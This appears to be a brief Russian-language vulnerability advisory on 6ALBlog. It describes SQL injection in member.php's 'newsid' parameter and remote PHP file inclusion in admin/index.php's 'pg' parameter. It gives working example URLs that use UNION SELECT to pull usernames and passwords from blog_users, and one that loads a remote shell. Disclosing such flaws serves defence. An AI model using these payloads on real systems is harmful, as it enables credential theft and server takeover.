Хакер #305. Многошаговые SQL-инъекции
Программа: 6ALBlog
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и произвольный PHP сценарий на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «newsid» сценарием member.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[Taget]/[Path]/member.php?page=comments&member= MEMBERNAME&newsid=-1%20union%20select%200,1 ,user,3,4,5,6,7%20from%20blog_users/*
http://[Taget]/[Path]/member.php?page=comments&member= MEMBERNAME&newsid=-1%20union%20select%200,1 ,pass,3,4,5,6,7%20from%20blog_users/*
2) Уязвимость существует из-за недостаточной обработки входных данных в параметре «pg» сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://[Taget]/[Path]/admin/index.php?pg=Sh3ll?